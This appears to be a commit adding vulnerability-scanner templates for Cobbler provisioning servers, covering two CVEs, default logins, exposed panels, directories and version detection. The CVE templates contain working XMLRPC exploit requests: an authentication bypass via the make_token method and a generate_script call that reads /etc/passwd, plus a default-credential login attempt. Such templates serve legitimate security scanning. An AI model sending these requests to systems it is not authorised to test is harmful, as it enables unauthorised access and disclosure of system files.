Added Cobbler provisioning server Templates (#3698)

Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com>

Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com>

cves/2018/CVE-2018-1000226.yaml

@@ -0,0 +1,60 @@
+id: CVE-2018-1000226
+
+info:
+  name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
+  author: c-sh0
+  severity: critical
+  reference:
+    - https://github.com/cobbler/cobbler/issues/1916
+    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2018-1000226
+    cwe-id: CWE-732
+  tags: cve,cve2018,cobbler,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
+          <params>
+            <param>
+              <value>
+                <string>cobbler</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "Content-Type: text/xml"
+
+      - type: word
+        part: body
+        words:
+          - "<methodResponse>"
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<name>faultCode</name>')"
+
+      - type: regex
+        part: body
+        regex:
+          - "(.*[a-zA-Z0-9].+==)</string></value>"

cves/2021/CVE-2021-40323.yaml

@@ -0,0 +1,95 @@
+id: CVE-2021-40323
+
+info:
+  name: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method
+  severity: critical
+  author: c-sh0
+  reference:
+    - https://github.com/cobbler/cobbler/issues/2795
+    - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40323
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-40323
+    cwe-id: CWE-94
+  tags: cve,cve2021,cobbler,rce
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>find_profile</methodName>
+          <params>
+            <param>
+              <value>
+                <struct>
+                  <member>
+                    <name>name</name>
+                    <value>
+                      <string>*</string>
+                    </value>
+                  </member>
+                </struct>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>generate_script</methodName>
+          <params>
+            <param>
+              <value>
+                <string>{{profile}}</string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string></string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string>/etc/passwd</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    extractors:
+      - type: regex
+        name: profile
+        internal: true
+        group: 1
+        regex:
+          - '<value><string>(.*?)</string></value>'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - 'text/xml'
+
+      - type: regex
+        regex:
+          - "root:.*:0"
+          - "bin:.*:1"
+          - "nobody:.*:99"
+        condition: or

default-logins/cobbler/cobbler-default-login.yaml

@@ -0,0 +1,66 @@
+id: cobbler-default-login
+
+info:
+  name: Cobbler Default Login
+  author: c-sh0
+  reference:
+    - https://github.com/cobbler/cobbler/issues/2307
+    - https://github.com/cobbler/cobbler/issues/2909
+  severity: high
+  tags: cobbler,default-login,api
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>login</methodName>
+          <params>
+            <param>
+              <value>
+                <string>{{username}}</string>
+              </value>
+            </param>
+            <param>
+              <value>
+                <string>{{password}}</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    attack: pitchfork
+    payloads:
+      username:
+        - cobbler
+        - testing
+      password:
+        - cobbler
+        - testing
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - 'text/xml'
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<name>faultCode</name>')"
+          - "!contains(tolower(body), 'login failed')"
+        condition: or
+
+      - type: regex
+        part: body
+        regex:
+          - "(.*[a-zA-Z0-9].+==)</string></value>"

exposed-panels/cobbler-webgui.yaml

@@ -0,0 +1,31 @@
+id: cobbler-webgui
+
+info:
+  name: Cobbler WebGUI Detection
+  author: c-sh0
+  description: Detection of Cobbler WebGUI
+  severity: info
+  metadata:
+    shodan-query: http.title:"Cobbler Web Interface"
+  tags: cobbler,webserver,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cobbler_web"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "<title>Cobbler Web Interface</title>"
+          - "/cobbler_webui_content/"
+          - "/cobbler_web/do_login"
+        condition: or

misconfiguration/cobbler-exposed-directory.yaml

@@ -0,0 +1,27 @@
+id: cobbler-exposed-directory
+
+info:
+  name: Exposed Cobbler Directories
+  author: c-sh0
+  severity: medium
+  description: Searches for exposed Cobbler Directories
+  tags: cobbler,exposure,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cobbler/"
+      - "{{BaseURL}}/cblr/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Index of /cobbler"
+          - "Index of /cblr"
+        condition: or

technologies/cobbler-version.yaml

@@ -0,0 +1,41 @@
+id: cobbler-version
+
+info:
+  name: Cobbler Version Detection
+  author: c-sh0
+  severity: info
+  description: Obtain cobbler version information
+  tags: tech,cobbler,api
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/cobbler_api"
+
+    body: |
+        <?xml version='1.0'?>
+        <methodCall>
+        <methodName>extended_version</methodName>
+        <params></params>
+        </methodCall>
+
+    headers:
+      Content-Type: text/xml
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<name>version</name>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<value><string>([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})</string></value>"